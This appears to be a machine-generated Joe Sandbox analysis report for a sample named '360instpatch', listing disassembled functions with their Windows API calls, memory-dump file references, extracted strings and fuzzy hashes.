                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF26C75
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,000001FE,?,?,00000001), ref: 6BF26C96
                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 6BF26CA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue_memset_wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4123947661-0
                                                                                                                                                                                                              • Opcode ID: 4978dda86e0746564012058899b1fb89730bea8237bbd82874f77c56d3fccca5
                                                                                                                                                                                                              • Instruction ID: d350fc5769f58881857997a40234095d08f5b3c2be010361fb98c9228dcfb4e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4978dda86e0746564012058899b1fb89730bea8237bbd82874f77c56d3fccca5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD11C877600329BBD700EBA4DD44FDBB3BCDB48700F1081A5B615D3251DB34DA448BA0
                                                                                                                                                                                                              Function 6BF36EBA Relevance: 4.5, APIs: 3, Instructions: 48networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$htons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3561267147-0
                                                                                                                                                                                                              • Opcode ID: 359ffefbac80bf745717557a9f49e390e19f1e7a2525199ac11cdbbf240f3238
                                                                                                                                                                                                              • Instruction ID: f4862878c1235f0d8d92f3550f56b91d5a277336a0b776c93120697c31ad1a7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359ffefbac80bf745717557a9f49e390e19f1e7a2525199ac11cdbbf240f3238
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88016D7B608236BB9B009FA5CC81CAF77ADAF4669471104A9F94197120D73AD9509BE0
                                                                                                                                                                                                              Function 00B12770 Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00B12744,?), ref: 00B12784
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B127CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B127D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1378612225-0
                                                                                                                                                                                                              • Opcode ID: 3148eb3e2b4a958ff3ae5e1c133c122859d454da9f4527abe91493e1d93381ea
                                                                                                                                                                                                              • Instruction ID: 6d54200c59f9c9ce70e5c88f455c717acb454e1641c00cd28894d4832ce6ce16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3148eb3e2b4a958ff3ae5e1c133c122859d454da9f4527abe91493e1d93381ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0E93579031177E73023347D4AFC76AD5DBD8B20F150554FA15BB2D4F9A0AC928199
                                                                                                                                                                                                              Function 6BF2E920 Relevance: 4.5, APIs: 3, Instructions: 39synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6BEFC0AE), ref: 6BF2E92A
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6BF2E959
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BF2E964
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateEventHandleObjectSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2631291778-0
                                                                                                                                                                                                              • Opcode ID: c2115e2dd13ae7f9e3732ec9e8ed9511f5f0498c5632db43eb2949ca515b9245
                                                                                                                                                                                                              • Instruction ID: e55bf7df06a13ec01ac1e0985b167113cba95126baf6fda398d249398771b4cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2115e2dd13ae7f9e3732ec9e8ed9511f5f0498c5632db43eb2949ca515b9245
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F03A73510611BECB605B7A9C4CC4BBBF8EAD7B603148A5EB06AC2170E6799444CA70
                                                                                                                                                                                                              Function 00B80319 Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00B8059E,?,00BFCDA4,?,00B8059E,?), ref: 00B80323
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00B8059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,00B8059E,?), ref: 00B8033E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B80367
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateDeleteHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3273607511-0
                                                                                                                                                                                                              • Opcode ID: f37c78dc9653e83bde842c927f1589e8393e548cd9cb206dae2d3ff958e74663
                                                                                                                                                                                                              • Instruction ID: b56b76df9c81319e06d93a3c194d61044deb1effe7c6c0c83eff896caa1e942d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f37c78dc9653e83bde842c927f1589e8393e548cd9cb206dae2d3ff958e74663
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F0E932150204FFD7213B60DC45FEA3EA9DB887B1F004424FA15970E0DA72E051D7A8
                                                                                                                                                                                                              Function 6CDDDF34 Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CDDDF4E
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __FF_MSGBANNER.LIBCMT ref: 6CDDD4A1
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __NMSG_WRITE.LIBCMT ref: 6CDDD4A8
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: RtlAllocateHeap.NTDLL(00000000,6CDDDF44,?,?,?,?,6CDDDF53,?), ref: 6CDDD4F5
                                                                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 6CDDDF71
                                                                                                                                                                                                                • Part of subcall function 6CDDDF19: std::exception::exception.LIBCMT ref: 6CDDDF25
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CDDDF93
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3715980512-0
                                                                                                                                                                                                              • Opcode ID: 44b4e40483320c67ca08f4a9454e7f7fc3ec08d16f72fef96034b07f38cd9ea1
                                                                                                                                                                                                              • Instruction ID: 949aca94849bf0f1a3fc5c531e6912842d17f6a5e1c8f9d0dc60de95785b59dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b4e40483320c67ca08f4a9454e7f7fc3ec08d16f72fef96034b07f38cd9ea1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1F02731E08185A2CF0457B0DC119D83BB8AF4131CB224159D91197DB0DF21FA1C8BB2
                                                                                                                                                                                                              Function 6BF38425 Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __FF_MSGBANNER.LIBCMT ref: 6BF3858D
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __NMSG_WRITE.LIBCMT ref: 6BF38594
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,6BF42E8E,00000002,00000001,00000002,?,6BF3F8B1,00000018,6BF7C4F0,0000000C,6BF3F942), ref: 6BF385E1
                                                                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 6BF38462
                                                                                                                                                                                                                • Part of subcall function 6BF3840A: std::exception::exception.LIBCMT ref: 6BF38416
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BF38484
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3715980512-0
                                                                                                                                                                                                              • Opcode ID: 840c83428332f3a657710968a653f2af3e0ab31d08a72c3ae0c60bf1b0f497f5
                                                                                                                                                                                                              • Instruction ID: 9f355cc390befcbf5886a6e8bb0e83964c25f0074ad9871f2853b381a7695a7f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 840c83428332f3a657710968a653f2af3e0ab31d08a72c3ae0c60bf1b0f497f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F0273380012AB6DF44E731D81A94F7B589B01A5CF1080A4D852D28B0DF2EC6858BD1
                                                                                                                                                                                                              Function 6BF19455 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 406COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF194C1
                                                                                                                                                                                                                • Part of subcall function 6BF193DF: UrlCanonicalizeW.SHLWAPI(?,?,00000824,20000000), ref: 6BF19429
                                                                                                                                                                                                                • Part of subcall function 6BEF1768: _wcslen.LIBCMT ref: 6BEF176F
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                                • Part of subcall function 6BEE8FA1: char_traits.LIBCPMT ref: 6BEE901B
                                                                                                                                                                                                                • Part of subcall function 6BEED55B: _wcslen.LIBCMT ref: 6BEED562
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslenchar_traits$Canonicalize_memset
                                                                                                                                                                                                              • String ID: ://
                                                                                                                                                                                                              • API String ID: 1237851060-1869659232
                                                                                                                                                                                                              • Opcode ID: cccc4453c2eb3c5e53842a2608e49a46ecc32380a688968607273dafa33e4e42
                                                                                                                                                                                                              • Instruction ID: e2caf012ba4d7dff40bcca973a72463c5dcc4810c6283eac01a3cd2708f3cfa2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cccc4453c2eb3c5e53842a2608e49a46ecc32380a688968607273dafa33e4e42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAE143B680014CAEDB25DFA4CD95EEF7BBCEF15348F10455DA809A7181EB385A09CBB1
                                                                                                                                                                                                              Function 6BF0EC26 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID: DNS--CName:
                                                                                                                                                                                                              • API String ID: 2102423945-2042605141
                                                                                                                                                                                                              • Opcode ID: f71dcb98dab9560eeef630fd26afbb595d5b552610caa4e074db4edad5cbb725
                                                                                                                                                                                                              • Instruction ID: 2474453e8ac44136aceff9442a3db938e11a661a8f6e1b7356dc3cdde4479ea3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f71dcb98dab9560eeef630fd26afbb595d5b552610caa4e074db4edad5cbb725
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8161AD3391160AAFDB258FB4CD20A9EBBB6BF15704F00096DE45A92930DF39A955EF40
                                                                                                                                                                                                              Function 6BF1151C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF11523
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: __EH_prolog3.LIBCMT ref: 6BF0C7DF
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: GetTickCount.KERNEL32 ref: 6BF0C85B
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: _memset.LIBCMT ref: 6BF0C964
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s, xrefs: 6BF11577, 6BF1160D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_memset$CountTickwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s
                                                                                                                                                                                                              • API String ID: 4122227224-1580467494
                                                                                                                                                                                                              • Opcode ID: 5dff2e30d0075aea53d0aa4a857b3bfdd8dfe690088fbad42b9036960e35bdc7
                                                                                                                                                                                                              • Instruction ID: 9bcfc46c6cce648130d8e211dfae8852f7484721341f25fbcb873e9f898dc3e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dff2e30d0075aea53d0aa4a857b3bfdd8dfe690088fbad42b9036960e35bdc7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21D277700217BBCF015FB88CA196E7667AF94308F00492CF9169A2B0DF7E8A11A761
                                                                                                                                                                                                              Function 6BF32C7A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick
                                                                                                                                                                                                              • String ID: Login begin Timer
                                                                                                                                                                                                              • API String ID: 536389180-3628901022
                                                                                                                                                                                                              • Opcode ID: 422e62492c9bebbf55dc627c92e41207500a896b10d6c0a4a94009fb416c5251
                                                                                                                                                                                                              • Instruction ID: b73f150e270a0dcfcfd008f988ee0c6939ace0e2fcf287a4dd4e14fe81df7161
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422e62492c9bebbf55dc627c92e41207500a896b10d6c0a4a94009fb416c5251
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1310673A097A19EE725DF74D4E875ABBE19B41304F0009AEC59A87270D73BA84CC7D1
                                                                                                                                                                                                              Function 6BF35ECE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,6BF35999,6BFCC810,00000000,?), ref: 6BF35F2C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
